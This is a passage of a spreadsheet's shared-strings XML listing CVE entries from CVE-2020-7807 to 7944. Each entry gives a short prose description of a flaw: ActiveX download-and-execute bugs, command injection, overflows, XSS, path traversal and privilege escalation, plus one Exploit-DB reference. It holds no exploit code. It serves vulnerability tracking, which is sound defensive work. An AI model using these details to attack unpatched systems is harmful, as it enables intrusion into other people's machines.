    <t>Tobesoft Xplatform 9.2.2.250 and earlier version have an arbitrary code execution vulnerability by using method supported by Xplatform ActiveX Control. It allows attacker to cause remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7807</t>
  </si>
  <si>
    <t>A vulnerability that can hijack a DLL file that is loaded during products(LGPCSuite_Setup, IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup) installation into a DLL file that the hacker wants. Missing Support for Integrity Check vulnerability in ____COMPONENT____ of LG Electronics (LGPCSuite_Setup), (IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup) allows ____ATTACKER/ATTACK____ to cause ____IMPACT____. This issue affects: LG Electronics; LGPCSuite_Setup : 1.0.0.3 on Windows(x86, x64); IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup : 1.0.0.9 on Windows(x86, x64).</t>
  </si>
  <si>
    <t>CVE-2020-7808</t>
  </si>
  <si>
    <t>In RAONWIZ K Upload v2018.0.2.51 and prior, automatic update processing without integrity check on update module(web.js) allows an attacker to modify arguments which causes downloading a random DLL and injection on it.</t>
  </si>
  <si>
    <t>CVE-2020-7809</t>
  </si>
  <si>
    <t>ALSong 3.46 and earlier version contain a Document Object Model (DOM) based cross-site scripting vulnerability caused by improper validation of user input. A remote attacker could exploit this vulnerability by tricking the victim to open ALSong Album(sab) file.</t>
  </si>
  <si>
    <t>CVE-2020-7810</t>
  </si>
  <si>
    <t>hslogin2.dll ActiveX Control in Groupware contains a vulnerability that could allow remote files to be downloaded and executed by setting the arguments to the activex method. This is due to a lack of integrity verification of the policy files referenced in the update process, and a remote attacker could induce a user to crafted web page, causing damage such as malicious code infection.</t>
  </si>
  <si>
    <t>CVE-2020-7811</t>
  </si>
  <si>
    <t>Samsung Update 3.0.2.0 ~ 3.0.32.0 has a vulnerability that allows privilege escalation as commands crafted by attacker are executed while the engine deserializes the data received during inter-process communication</t>
  </si>
  <si>
    <t>CVE-2020-7812</t>
  </si>
  <si>
    <t>Ezhttptrans.ocx ActiveX Control in Kaoni ezHTTPTrans 1.0.0.70 and prior versions contain a vulnerability that could allow remote attacker to download arbitrary file by setting the arguments to the activex method. This can be leveraged for code execution by rebooting the victim’s PC.</t>
  </si>
  <si>
    <t>CVE-2020-7813</t>
  </si>
  <si>
    <t>Ezhttptrans.ocx ActiveX Control in Kaoni ezHTTPTrans 1.0.0.70 and prior versions contain a vulnerability that could allow remote attacker to download and execute arbitrary file by setting the arguments to the activex method. This can be leveraged for code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7814</t>
  </si>
  <si>
    <t>RAONWIZ v2018.0.2.50 and eariler versions contains a vulnerability that could allow remote files to be downloaded and excuted by lack of validation to file extension, witch can used as remote-code-excution attacks by hackers File download &amp; execution vulnerability in ____COMPONENT____ of RAONWIZ RAON KUpload allows ____ATTACKER/ATTACK____ to cause ____IMPACT____. This issue affects: RAONWIZ RAON KUpload 2018.0.2.50 versions prior to 2018.0.2.51 on Windows.</t>
  </si>
  <si>
    <t>CVE-2020-7815</t>
  </si>
  <si>
    <t>XPLATFORM v9.2.260 and eariler versions contain a vulnerability that could allow remote files to be downloaded by setting the arguments to the vulnerable method. this can be leveraged for code execution. File download vulnerability in ____COMPONENT____ of TOBESOFT XPLATFORM allows ____ATTACKER/ATTACK____ to cause ____IMPACT____. This issue affects: TOBESOFT XPLATFORM 9.2.250 versions prior to 9.2.260 on Windows.</t>
  </si>
  <si>
    <t>CVE-2020-7816</t>
  </si>
  <si>
    <t>A vulnerability in the JPEG image parsing module in DaView Indy, DaVa+, DaOffice softwares could allow an unauthenticated, remote attacker to cause an arbitrary code execution on an affected device.nThe vulnerability is due to a stack overflow read. An attacker could exploit this vulnerability by sending a crafted PDF file to an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-7817</t>
  </si>
  <si>
    <t>MyBrowserPlus downloads the files needed to run the program through the setup file (Setup.inf). At this time, there is a vulnerability in downloading arbitrary files due to insufficient integrity verification of the files.</t>
  </si>
  <si>
    <t>CVE-2020-7818</t>
  </si>
  <si>
    <t>DaviewIndy 8.98.9 and earlier has a Heap-based overflow vulnerability, triggered when the user opens a malformed PDF file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7819</t>
  </si>
  <si>
    <t>A SQL-Injection vulnerability in the nTracker USB Enterprise(secure USB management solution) allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information.</t>
  </si>
  <si>
    <t>CVE-2020-7820</t>
  </si>
  <si>
    <t>Nexacro14/17 ExtCommonApiV13 Library under 2019.9.6 version contain a vulnerability that could allow remote attacker to execute arbitrary code by setting the arguments to the vulnerable API. This can be leveraged for code execution by rebooting the victim’s PC</t>
  </si>
  <si>
    <t>CVE-2020-7821</t>
  </si>
  <si>
    <t>Nexacro14/17 ExtCommonApiV13 Library under 2019.9.6 version contain a vulnerability that could allow remote attacker to execute arbitrary code by modifying the value of registry path. This can be leveraged for code execution by rebooting the victim’s PC</t>
  </si>
  <si>
    <t>CVE-2020-7822</t>
  </si>
  <si>
    <t>DaviewIndy has a Heap-based overflow vulnerability, triggered when the user opens a malformed image file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7823</t>
  </si>
  <si>
    <t>DaviewIndy has a Memory corruption vulnerability, triggered when the user opens a malformed image file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7824</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of iPECS could allow an authenticated, remote attacker to get administrator permission. The vulnerability is due to insecure permission when handling session cookies. An attacker could exploit this vulnerability by modification the cookie value to an affected device. A successful exploit could allow the attacker access to sensitive device information, which includes configuration files.</t>
  </si>
  <si>
    <t>CVE-2020-7825</t>
  </si>
  <si>
    <t>A vulnerability exists that could allow the execution of operating system commands on systems running MiPlatform 2019.05.16 and earlier. An attacker could execute arbitrary remote command by sending parameters to WinExec function in ExtCommandApi.dll module of MiPlatform.</t>
  </si>
  <si>
    <t>CVE-2020-7826</t>
  </si>
  <si>
    <t>EyeSurfer BflyInstallerX.ocx v1.0.0.16 and earlier versions contain a vulnerability that could allow remote files to be download by setting the arguments to the vulnerable method. This can be leveraged for code execution. When the vulnerable method is called, they fail to properly check the parameters that are passed to it.</t>
  </si>
  <si>
    <t>CVE-2020-7827</t>
  </si>
  <si>
    <t>DaviewIndy 8.98.7 and earlier version contain Use-After-Free vulnerability, triggered when the user opens a malformed specific file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7828</t>
  </si>
  <si>
    <t>DaviewIndy 8.98.4 and earlier version contain Heap-based overflow vulnerability, triggered when the user opens a malformed specific file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7829</t>
  </si>
  <si>
    <t>CVE-2020-7830</t>
  </si>
  <si>
    <t>RAONWIZ v2018.0.2.50 and earlier versions contains a vulnerability that could allow remote files to be downloaded by lack of validation. Vulnerabilities in downloading with Kupload agent allow files to be downloaded to arbitrary paths due to insufficient verification of extensions and download paths. This issue affects: RAONWIZ RAON KUpload 2018.0.2.50 versions and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-7831</t>
  </si>
  <si>
    <t>A vulnerability in the web-based contract management service interface Ebiz4u of INOGARD could allow an victim user to download any file. The attacker is able to use startup menu directory via directory traversal for automatic execution. The victim user need to reboot, however.</t>
  </si>
  <si>
    <t>CVE-2020-7832</t>
  </si>
  <si>
    <t>A vulnerability (improper input validation) in the DEXT5 Upload solution allows an unauthenticated attacker to download and execute an arbitrary file via AddUploadFile, SetSelectItem, DoOpenFile function.(CVE-2020-7832)</t>
  </si>
  <si>
    <t>CVE-2020-7836</t>
  </si>
  <si>
    <t>VOICEYE WSActiveBridgeES versions prior to 2.1.0.3 contains a stack-based buffer overflow vulnerability caused by improper bound checking parameter given by attack. It finally leads to a stack-based buffer overflow via access to crafted web page.</t>
  </si>
  <si>
    <t>CVE-2020-7837</t>
  </si>
  <si>
    <t>An issue was discovered in ML Report Program. There is a stack-based buffer overflow in function sub_41EAF0 at MLReportDeamon.exe. The function will call vsprintf without checking the length of strings in parameters given by attacker. And it finally leads to a stack-based buffer overflow via access to crafted web page. This issue affects: Infraware ML Report 2.19.312.0000.</t>
  </si>
  <si>
    <t>CVE-2020-7838</t>
  </si>
  <si>
    <t>A arbitrary code execution vulnerability exists in the way that the Stove client improperly validates input value. An attacker could execute arbitrary code when the user access to crafted web page. This issue affects: Smilegate STOVE Client 0.0.4.72.</t>
  </si>
  <si>
    <t>CVE-2020-7839</t>
  </si>
  <si>
    <t>In MaEPSBroker 2.5.0.31 and prior, a command injection vulnerability caused by improper input validation checks when parsing brokerCommand parameter.</t>
  </si>
  <si>
    <t>CVE-2020-7841</t>
  </si>
  <si>
    <t>Improper input validation vulnerability exists in TOBESOFT XPLATFORM which could cause arbitrary .hta file execution when the command string is begun with http://, https://, mailto://</t>
  </si>
  <si>
    <t>CVE-2020-7842</t>
  </si>
  <si>
    <t>Improper Input validation vulnerability exists in Netis Korea D'live AP which could cause arbitrary command injection and execution when the time setting (using ntpServerlp1 parameter) for the users. This affects D'live set-top box AP(WF2429TB) v1.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-7845</t>
  </si>
  <si>
    <t>Spamsniper 5.0 ~ 5.2.7 contain a stack-based buffer overflow vulnerability caused by improper boundary checks when parsing MAIL FROM command. It leads remote attacker to execute arbitrary code via crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-7846</t>
  </si>
  <si>
    <t>Helpcom before v10.0 contains a file download and execution vulnerability caused by storing hardcoded cryptographic key. It finally leads to a file download and execution via access to crafted web page.</t>
  </si>
  <si>
    <t>CVE-2020-7847</t>
  </si>
  <si>
    <t>The ipTIME NAS product allows an arbitrary file upload vulnerability in the Manage Bulletins/Upload feature, which can be leveraged to gain remote code execution. This issue affects: pTIME NAS 1.4.36.</t>
  </si>
  <si>
    <t>CVE-2020-7848</t>
  </si>
  <si>
    <t>The EFM ipTIME C200 IP Camera is affected by a Command Injection vulnerability in /login.cgi?logout=1 script. To exploit this vulnerability, an attacker can send a GET request that executes arbitrary OS commands via cookie value.</t>
  </si>
  <si>
    <t>CVE-2020-7849</t>
  </si>
  <si>
    <t>A vulnerability of uPrism.io CURIX(Video conferecing solution) could allow an unauthenticated attacker to execute arbitrary code. This vulnerability is due to insufficient input(server domain) validation. An attacker could exploit this vulnerability through crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-7850</t>
  </si>
  <si>
    <t>NBBDownloader.ocx ActiveX Control in Groupware contains a vulnerability that could allow remote files to be downloaded and executed by setting the arguments to the activex method. A remote attacker could induce a user to access a crafted web page, causing damage such as malicious code infection.</t>
  </si>
  <si>
    <t>CVE-2020-7851</t>
  </si>
  <si>
    <t>Innorix Web-Based File Transfer Solution versuibs prior to and including 9.2.18.385 contains a vulnerability that could allow remote files to be downloaded and executed by setting the arguments to the internal method. A remote attacker could induce a user to access a crafted web page, causing damage such as malicious code infection.</t>
  </si>
  <si>
    <t>CVE-2020-7852</t>
  </si>
  <si>
    <t>DaviewIndy has a Heap-based overflow vulnerability, triggered when the user opens a malformed ex.j2c format file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7853</t>
  </si>
  <si>
    <t>An outbound read/write vulnerability exists in XPLATFORM that does not check offset input ranges, allowing out-of-range data to be read. An attacker can exploit arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7856</t>
  </si>
  <si>
    <t>A vulnerability of Helpcom could allow an unauthenticated attacker to execute arbitrary command. This vulnerability exists due to insufficient authentication validation.</t>
  </si>
  <si>
    <t>CVE-2020-7857</t>
  </si>
  <si>
    <t>A vulnerability of XPlatform could allow an unauthenticated attacker to execute arbitrary command. This vulnerability exists due to insufficient validation of improper classes. This issue affects: Tobesoft XPlatform versions prior to 9.2.2.280.</t>
  </si>
  <si>
    <t>CVE-2020-7858</t>
  </si>
  <si>
    <t>There is a directory traversing vulnerability in the download page url of AquaNPlayer 2.0.0.92. The IP of the download page url is localhost and an attacker can traverse directories using "dot dot" sequences(../../) to view host file on the system. This vulnerability can cause information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-7860</t>
  </si>
  <si>
    <t>UnEGG v0.5 and eariler versions have a Integer overflow vulnerability, triggered when the user opens a malformed specific file that is mishandled by UnEGG. Attackers could exploit this and arbitrary code execution. This issue affects: Estsoft UnEGG 0.5 versions prior to 1.0 on linux.</t>
  </si>
  <si>
    <t>CVE-2020-7861</t>
  </si>
  <si>
    <t>AnySupport (Remote support solution) before 2019.3.21.0 allows directory traversing because of swprintf function to copy file from a management PC to a client PC. This can be lead to arbitrary file execution.</t>
  </si>
  <si>
    <t>CVE-2020-7862</t>
  </si>
  <si>
    <t>A vulnerability in agent program of HelpU remote control solution could allow an authenticated remote attacker to execute arbitrary commands This vulnerability is due to insufficient input santization when communicating customer process.</t>
  </si>
  <si>
    <t>CVE-2020-7863</t>
  </si>
  <si>
    <t>A vulnerability in File Transfer Solution of Raonwiz could allow arbitrary command execution as the result of viewing a specially-crafted web page. This vulnerability is due to insufficient validation of the parameter of the specific method. An attacker could exploit this vulnerability by setting the parameter to the command they want to execute. A successful exploit could allow the attacker to execute arbitrary commands on a target system as the user. However, the victim must run the Internet Explorer browser with administrator privileges because of the cross-domain policy.</t>
  </si>
  <si>
    <t>CVE-2020-7864</t>
  </si>
  <si>
    <t>Parameter manipulation can bypass authentication to cause file upload and execution. This will execute the remote code. This issue affects: Raonwiz DEXT5Editor versions prior to 3.5.1405747.1100.03.</t>
  </si>
  <si>
    <t>CVE-2020-7865</t>
  </si>
  <si>
    <t>A vulnerability(improper input validation) in the ExECM CoreB2B solution allows an unauthenticated attacker to download and execute an arbitrary file via httpDownload function. A successful exploit could allow the attacker to hijack vulnerable system.</t>
  </si>
  <si>
    <t>CVE-2020-7866</t>
  </si>
  <si>
    <t>When using XPLATFORM 9.2.2.270 or earlier versions ActiveX component, arbitrary commands can be executed due to improper input validation</t>
  </si>
  <si>
    <t>CVE-2020-7867</t>
  </si>
  <si>
    <t>An improper input validation vulnerability in Helpu solution could allow a local attacker to arbitrary file creation and execution without click file transfer menu. It is possible to file in arbitrary directory for user because the viewer program receive the file from agent with privilege of administrator.</t>
  </si>
  <si>
    <t>CVE-2020-7868</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in helpUS(remote administration tool) due to improper validation of parameter of ShellExecutionExA function used for login.</t>
  </si>
  <si>
    <t>CVE-2020-7869</t>
  </si>
  <si>
    <t>An improper input validation vulnerability of ZOOK software (remote administration tool) could allow a remote attacker to create arbitrary file. The ZOOK viewer has the "Tight file CMD" function to create file. An attacker could create and execute arbitrary file in the ZOOK agent program using "Tight file CMD" without authority.</t>
  </si>
  <si>
    <t>CVE-2020-7870</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when ezPDF improperly handles the parameter. This vulnerability exists due to insufficient validation of the parameter.</t>
  </si>
  <si>
    <t>CVE-2020-7871</t>
  </si>
  <si>
    <t>A vulnerability of Helpcom could allow an unauthenticated attacker to execute arbitrary command. This vulnerability exists due to insufficient validation of the parameter. This issue affects: Cnesty Helpcom 10.0 versions prior to.</t>
  </si>
  <si>
    <t>CVE-2020-7872</t>
  </si>
  <si>
    <t>DaviewIndy v8.98.7.0 and earlier versions have a Integer overflow vulnerability, triggered when the user opens a malformed format file that is mishandled by DaviewIndy. Attackers could exploit this and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7873</t>
  </si>
  <si>
    <t>Download of code without integrity check vulnerability in ActiveX control of Younglimwon Co., Ltd allows the attacker to cause a arbitrary file download and execution.</t>
  </si>
  <si>
    <t>CVE-2020-7874</t>
  </si>
  <si>
    <t>Download of code without integrity check vulnerability in NEXACRO14 Runtime ActiveX control of tobesoft Co., Ltd allows the attacker to cause an arbitrary file download and execution. This vulnerability is due to incomplete validation of file download URL or file extension.</t>
  </si>
  <si>
    <t>CVE-2020-7875</t>
  </si>
  <si>
    <t>DEXT5 Upload 5.0.0.117 and earlier versions contain a vulnerability, which could allow remote attacker to download and execute remote file by setting the argument, variable in the activeX module. This can be leveraged for code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7877</t>
  </si>
  <si>
    <t>A buffer overflow issue was discovered in ZOOK solution(remote administration tool) through processing 'ConnectMe' command while parsing a crafted OUTERIP value because of missing boundary check. This vulnerability allows the attacker to execute remote arbitrary command.</t>
  </si>
  <si>
    <t>CVE-2020-7878</t>
  </si>
  <si>
    <t>An arbitrary file download and execution vulnerability was found in the VideoOffice X2.9 and earlier versions (CVE-2020-7878). This issue is due to missing support for integrity check.</t>
  </si>
  <si>
    <t>CVE-2020-7879</t>
  </si>
  <si>
    <t>This issue was discovered when the ipTIME C200 IP Camera was synchronized with the ipTIME NAS. It is necessary to extract value for ipTIME IP camera because the ipTIME NAS send ans setCookie('[COOKIE]') . The value is transferred to the --header option in wget binary, and there is no validation check. This vulnerability allows remote attackers to execute remote command.</t>
  </si>
  <si>
    <t>CVE-2020-7880</t>
  </si>
  <si>
    <t>The vulnerabilty was discovered in ActiveX module related to NeoRS remote support program. This issue allows an remote attacker to download and execute remote file. It is because of improper parameter validation of StartNeoRS function in ActiveX.</t>
  </si>
  <si>
    <t>CVE-2020-7881</t>
  </si>
  <si>
    <t>The vulnerability function is enabled when the streamer service related to the AfreecaTV communicated through web socket using 21201 port. A stack-based buffer overflow leading to remote code execution was discovered in strcpy() operate by "FanTicket" field. It is because of stored data without validation of length.</t>
  </si>
  <si>
    <t>CVE-2020-7882</t>
  </si>
  <si>
    <t>Using the parameter of getPFXFolderList function, attackers can see the information of authorization certification and delete the files. It occurs because the parameter contains path traversal characters(ie. '../../../')</t>
  </si>
  <si>
    <t>CVE-2020-7883</t>
  </si>
  <si>
    <t>Printchaser v2.2021.804.1 and earlier versions contain a vulnerability, which could allow remote attacker to download and execute remote file by setting the argument, variable in the activeX module. This can be leveraged for code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7904</t>
  </si>
  <si>
    <t>In JetBrains IntelliJ IDEA before 2019.3, some Maven repositories were accessed via HTTP instead of HTTPS.</t>
  </si>
  <si>
    <t>CVE-2020-7905</t>
  </si>
  <si>
    <t>Ports listened to by JetBrains IntelliJ IDEA before 2019.3 were exposed to the network.</t>
  </si>
  <si>
    <t>CVE-2020-7906</t>
  </si>
  <si>
    <t>In JetBrains Rider versions 2019.3 EAP2 through 2019.3 EAP7, there were unsigned binaries provided by the Windows installer. This issue was fixed in release version 2019.3.</t>
  </si>
  <si>
    <t>CVE-2020-7907</t>
  </si>
  <si>
    <t>In the JetBrains Scala plugin before 2019.2.1, some artefact dependencies were resolved over unencrypted connections.</t>
  </si>
  <si>
    <t>CVE-2020-7908</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.1.5, reverse tabnabbing was possible on several pages.</t>
  </si>
  <si>
    <t>CVE-2020-7909</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.1.5, some server-stored passwords could be shown via the web UI.</t>
  </si>
  <si>
    <t>CVE-2020-7910</t>
  </si>
  <si>
    <t>JetBrains TeamCity before 2019.2 was vulnerable to a stored XSS attack by a user with the developer role.</t>
  </si>
  <si>
    <t>CVE-2020-7911</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.2, several user-level pages were vulnerable to XSS.</t>
  </si>
  <si>
    <t>CVE-2020-7912</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2019.2.59309, SMTP/Jabber settings could be accessed using backups.</t>
  </si>
  <si>
    <t>CVE-2020-7913</t>
  </si>
  <si>
    <t>JetBrains YouTrack 2019.2 before 2019.2.59309 was vulnerable to XSS via an issue description.</t>
  </si>
  <si>
    <t>CVE-2020-7914</t>
  </si>
  <si>
    <t>In JetBrains IntelliJ IDEA 2019.2, an XSLT debugger plugin misconfiguration allows arbitrary file read operations over the network. This issue was fixed in 2019.3.</t>
  </si>
  <si>
    <t>CVE-2020-7915</t>
  </si>
  <si>
    <t>An issue was discovered on Eaton 5P 850 devices. The Ubicacion SAI field allows XSS attacks by an administrator.</t>
  </si>
  <si>
    <t>CVE-2020-7916</t>
  </si>
  <si>
    <t>be_teacher in class-lp-admin-ajax.php in the LearnPress plugin 3.2.6.5 and earlier for WordPress allows any registered user to assign itself the teacher role via the wp-admin/admin-ajax.php?action=learnpress_be_teacher URI without any additional permission checks. Therefore, any user can change its role to an instructor/teacher and gain access to otherwise restricted data.</t>
  </si>
  <si>
    <t>CVE-2020-7918</t>
  </si>
  <si>
    <t>An insecure direct object reference in webmail in totemo totemomail 7.0.0 allows an authenticated remote user to read and modify mail folder names of other users via enumeration.</t>
  </si>
  <si>
    <t>CVE-2020-7919</t>
  </si>
  <si>
    <t>Go before 1.12.16 and 1.13.x before 1.13.7 (and the crypto/cryptobyte package before 0.0.0-20200124225646-8b5121be2f68 for Go) allows attacks on clients (resulting in a panic) via a malformed X.509 certificate.</t>
  </si>
  <si>
    <t>CVE-2020-7920</t>
  </si>
  <si>
    <t>pmm-server in Percona Monitoring and Management (PMM) 2.2.x before 2.2.1 allows unauthenticated denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-7921</t>
  </si>
  <si>
    <t>Improper serialization of internal state in the authorization subsystem in MongoDB Server's authorization subsystem permits a user with valid credentials to bypass IP whitelisting protection mechanisms following administrative action. This issue affects: MongoDB Inc. MongoDB Server 4.2 versions prior to 4.2.3; 4.0 versions prior to 4.0.15; 4.3 versions prior to 4.3.3; 3.6 versions prior to 3.6.18.</t>
  </si>
  <si>
    <t>CVE-2020-7922</t>
  </si>
  <si>
    <t>X.509 certificates generated by the MongoDB Enterprise Kubernetes Operator may allow an attacker with access to the Kubernetes cluster improper access to MongoDB instances. Customers who do not use X.509 authentication, and those who do not use the Operator to generate their X.509 certificates are unaffected. This issue affects: MongoDB Inc. MongoDB Enterprise Kubernetes Operator version 1.0, 1.1, 1.2 versions prior to 1.2.4, 1.3 versions prior to 1.3.1, 1.2, 1.4 versions prior to 1.4.4.</t>
  </si>
  <si>
    <t>CVE-2020-7923</t>
  </si>
  <si>
    <t>A user authorized to perform database queries may cause denial of service by issuing specially crafted queries, which violate an invariant in the query subsystem's support for geoNear. This issue affects: MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.0-rc7; v4.2 versions prior to 4.2.8; v4.0 versions prior to 4.0.19.</t>
  </si>
  <si>
    <t>CVE-2020-7924</t>
  </si>
  <si>
    <t>Usage of specific command line parameter in MongoDB Tools which was originally intended to just skip hostname checks, may result in MongoDB skipping all certificate validation. This may result in accepting invalid certificates.This issue affects: MongoDB Inc. MongoDB Database Tools 3.6 versions later than 3.6.5; 3.6 versions prior to 3.6.21; 4.0 versions prior to 4.0.21; 4.2 versions prior to 4.2.11; 100 versions prior to 100.2.0. MongoDB Inc. Mongomirror 0 versions later than 0.6.0.</t>
  </si>
  <si>
    <t>CVE-2020-7925</t>
  </si>
  <si>
    <t>Incorrect validation of user input in the role name parser may lead to use of uninitialized memory allowing an unauthenticated attacker to use a specially crafted request to cause a denial of service. This issue affects: MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.0-rc12; v4.2 versions prior to 4.2.9.</t>
  </si>
  <si>
    <t>CVE-2020-7926</t>
  </si>
  <si>
    <t>A user authorized to perform database queries may cause denial of service by issuing a specially crafted query which violates an invariant in the server selection subsystem. This issue affects: MongoDB Server version 4.4 prior to 4.4.1. Versions before 4.4 are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-7927</t>
  </si>
  <si>
    <t>Specially crafted API calls may allow an authenticated user who holds Organization Owner privilege to obtain an API key with Global Role privilege. This issue affects MongoDB Ops Manager v4.2 versions 4.2.0-4.2.17, v4.3 versions 4.3.0-4.3.9 and v4.4 versions 4.4.0-4.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-7928</t>
  </si>
  <si>
    <t>A user authorized to perform database queries may trigger a read overrun and access arbitrary memory by issuing specially crafted queries. This issue affects: MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.1; v4.2 versions prior to 4.2.9; v4.0 versions prior to 4.0.20; v3.6 versions prior to 3.6.20.</t>
  </si>
  <si>
    <t>CVE-2020-7929</t>
  </si>
  <si>
    <t>A user authorized to perform database queries may trigger denial of service by issuing specially crafted query contain a type of regex. This issue affects: MongoDB Inc. MongoDB Server v3.6 versions prior to 3.6.21 and MongoDB Server v4.0 versions prior to 4.0.20.</t>
  </si>
  <si>
    <t>CVE-2020-7931</t>
  </si>
  <si>
    <t>In JFrog Artifactory 5.x and 6.x, insecure FreeMarker template processing leads to remote code execution, e.g., by modifying a .ssh/authorized_keys file. Patches are available for various versions between 5.11.8 and 6.16.0. The issue exists because use of the DefaultObjectWrapper class makes certain Java functions accessible to a template.</t>
  </si>
  <si>
    <t>CVE-2020-7932</t>
  </si>
  <si>
    <t>OMERO.web before 5.6.3 optionally allows sensitive data elements (e.g., a session key) to be passed as URL query parameters. If an attacker tricks a user into clicking a malicious link in OMERO.web, the information in the query parameters may be exposed in the Referer header seen by the target. Information in the URL path such as object IDs may also be exposed.</t>
  </si>
  <si>
    <t>CVE-2020-7934</t>
  </si>
  <si>
    <t>In LifeRay Portal CE 7.1.0 through 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload will then be rendered when a user utilizes the search feature to search for other users (i.e., if a user with modified fields occurs in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49091.txt</t>
  </si>
  <si>
    <t>LifeRay 7.2.1 GA2 - Stored XSS</t>
  </si>
  <si>
    <t>2020-11-23</t>
  </si>
  <si>
    <t>CVE-2020-7935</t>
  </si>
  <si>
    <t>Artica Pandora FMS through 7.42 is vulnerable to remote PHP code execution because of an Unrestricted Upload Of A File With A Dangerous Type issue in the File Manager. An attacker can create a (or use an existing) directory that is externally accessible to store PHP files. The filename and the exact path is known by the attacker, so it is possible to execute PHP code in the context of the application. The vulnerability is exploitable only with Administrator access.</t>
  </si>
  <si>
    <t>CVE-2020-7936</t>
  </si>
  <si>
    <t>An open redirect on the login form (and possibly other places) in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site.</t>
  </si>
  <si>
    <t>CVE-2020-7937</t>
  </si>
  <si>
    <t>An XSS issue in the title field in Plone 5.0 through 5.2.1 allows users with a certain privilege level to insert JavaScript that will be executed when other users access the site.</t>
  </si>
  <si>
    <t>CVE-2020-7938</t>
  </si>
  <si>
    <t>plone.restapi in Plone 5.2.0 through 5.2.1 allows users with a certain privilege level to escalate their privileges up to the highest level.</t>
  </si>
  <si>
    <t>CVE-2020-7939</t>
  </si>
  <si>
    <t>SQL Injection in DTML or in connection objects in Plone 4.0 through 5.2.1 allows users to perform unwanted SQL queries. (This is a problem in Zope.)</t>
  </si>
  <si>
    <t>CVE-2020-7940</t>
  </si>
  <si>
    <t>Missing password strength checks on some forms in Plone 4.3 through 5.2.0 allow users to set weak passwords, leading to easier cracking.</t>
  </si>
  <si>
    <t>CVE-2020-7941</t>
  </si>
  <si>
    <t>A privilege escalation issue in plone.app.contenttypes in Plone 4.3 through 5.2.1 allows users to PUT (overwrite) some content without needing write permission.</t>
  </si>
  <si>
    <t>CVE-2020-7942</t>
  </si>
  <si>
    <t>Previously, Puppet operated on a model that a node with a valid certificate was entitled to all information in the system and that a compromised certificate allowed access to everything in the infrastructure. When a node's catalog falls back to the `default` node, the catalog can be retrieved for a different node by modifying facts for the Puppet run. This issue can be mitigated by setting `strict_hostname_checking = true` in `puppet.conf` on your Puppet master. Puppet 6.13.0 and 5.5.19 changes the default behavior for strict_hostname_checking from false to true. It is recommended that Puppet Open Source and Puppet Enterprise users that are not upgrading still set strict_hostname_checking to true to ensure secure behavior. Affected software versions: Puppet 6.x prior to 6.13.0 Puppet Agent 6.x prior to 6.13.0 Puppet 5.5.x prior to 5.5.19 Puppet Agent 5.5.x prior to 5.5.19 Resolved in: Puppet 6.13.0 Puppet Agent 6.13.0 Puppet 5.5.19 Puppet Agent 5.5.19</t>
  </si>
  <si>
    <t>CVE-2020-7943</t>
  </si>
  <si>
    <t>Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints. For PuppetDB this may contain things like hostnames. Puppet Server reports resource names and titles for defined types (which may contain sensitive information) as well as function names and class names. Previously, these endpoints were open to the local network. PE 2018.1.13 &amp; 2019.5.0, Puppet Server 6.9.2 &amp; 5.3.12, and PuppetDB 6.9.1 &amp; 5.2.13 disable trapperkeeper-metrics /v1 metrics API and only allows /v2 access on localhost by default. This affects software versions: Puppet Enterprise 2018.1.x stream prior to 2018.1.13 Puppet Enterprise prior to 2019.5.0 Puppet Server prior to 6.9.2 Puppet Server prior to 5.3.12 PuppetDB prior to 6.9.1 PuppetDB prior to 5.2.13 Resolved in: Puppet Enterprise 2018.1.13 Puppet Enterprise 2019.5.0 Puppet Server 6.9.2 Puppet Server 5.3.12 PuppetDB 6.9.1 PuppetDB 5.2.13</t>
  </si>
  <si>
    <t>CVE-2020-7944</t>
  </si>
  <si>
    <t>In Continuous Delivery for Puppet Enterprise (CD4PE) before 3.4.0, changes to resources or classes containing Sensitive parameters can result in the Sensitive parameters ending up in the impact analysis report.</t>
  </si>
  <si>
    <t>CVE-2020-7945</t>
  </si>
  <si>
